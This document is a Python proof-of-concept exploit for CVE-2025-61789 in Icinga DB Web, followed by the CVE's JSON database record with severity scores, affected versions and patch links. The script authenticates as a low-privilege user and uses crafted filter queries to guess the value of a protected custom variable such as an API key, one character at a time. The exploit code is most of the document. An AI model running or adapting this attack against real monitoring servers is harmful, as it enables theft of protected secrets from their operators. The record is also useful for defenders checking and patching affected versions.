CVE-2025-61789

# CVE-2025-61789 PoC - Icinga DB Web Protected Variable Information Disclosure # This PoC demonstrates how an authorized user can guess values of protected # custom variables through filter-based blind information disclosure. import requests # Configuration TARGET_URL = "https://icinga-db-web.example.com" USERNAME = "low_priv_user" PASSWORD = "user_password" PROTECTED_VAR = "secret_api_key" # The protected custom variable name TARGET_OBJECT = "hostname.example.com" # Target host/service to query # Step 1: Authenticate to Icinga DB Web session = requests.Session() login_data = { "username": USERNAME, "password": PASSWORD } session.post(f"{TARGET_URL}/authentication/login", data=login_data) # Step 2: Exploit - Use filter with protected variable to guess its value # The vulnerability allows using protected vars in filters, and the response # differs based on whether the guessed value matches the actual value. def check_filter_value(session, guess_value): """ Craft a filter using the protected variable and check if the guess is correct. In vulnerable versions, the server returns different responses based on whether the filter condition matches. """ filter_expr = f"host.name==\"{TARGET_OBJECT}\"&&vars.{PROTECTED_VAR}==\"{guess_value}\"" params = { "filter": filter_expr, "columns": "host.name" } response = session.get(f"{TARGET_URL}/icingadbweb/host/list", params=params) # If the result set is non-empty, the guessed value is correct # In vulnerable versions, this bypasses the protection mechanism return response.json() # Step 3: Blind enumeration of the protected variable value # Use character-by-character brute force or binary search def enumerate_variable(): discovered_value = "" charset = "abcdefghijklmnopqrstuvwxyz0123456789_-{}@!#$%^&*" for position in range(50): # Max length assumption found_char = None for char in charset: test_value = discovered_value + char result = check_filter_value(session, test_value) # Check if the filter matched (indicating prefix is correct) if result and len(result.get("results", [])) > 0: # Try extending to confirm test_extended = test_value + charset[0] result_ext = check_filter_value(session, test_extended) if not result_ext or len(result_ext.get("results", [])) == 0: found_char = char break if found_char is None: break discovered_value += found_char print(f"Discovered so far: {discovered_value}") return discovered_value # Note: In fixed versions (1.1.4 / 1.2.3), the server returns an error # when protected variables are used in filters, preventing this attack. if __name__ == "__main__": print("CVE-2025-61789 PoC - Protected Variable Information Disclosure") print(f"Target: {TARGET_URL}") print(f"Protected Variable: {PROTECTED_VAR}") # value = enumerate_variable() # print(f"Discovered value: {value}")

{"cve": {"id": "CVE-2025-61789", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:34.590", "lastModified": "2025-12-11T18:24:46.077", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Icinga DB Web provides a graphical interface for Icinga monitoring. Before 1.1.4 and 1.2.3, an authorized user with access to Icinga DB Web, can use a custom variable in a filter that is either protected by icingadb/protect/variables or hidden by icingadb/denylist/variables, to guess values assigned to it. Versions 1.1.4 and 1.2.3 respond with an error if such a custom variable is used."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga_db_web:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.4", "matchCriteriaId": "E2B379CF-663D-4407-A826-8996CD761C10"}, {"vulnerable": true, "criteria": "cpe:2.3:a:icinga:icinga_db_web:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.2.0", "versionEndExcluding": "1.2.3", "matchCriteriaId": "B58B59D2-206D-40B0-823F-E0DFACE93056"}]}]}], "references": [{"url": "https://github.com/Icinga/icingadb-web/commit/5e982dad40ec379075307ab1693580138e675b18", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/Icinga/icingadb-web/security/advisories/GHSA-w57j-28jc-8429", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}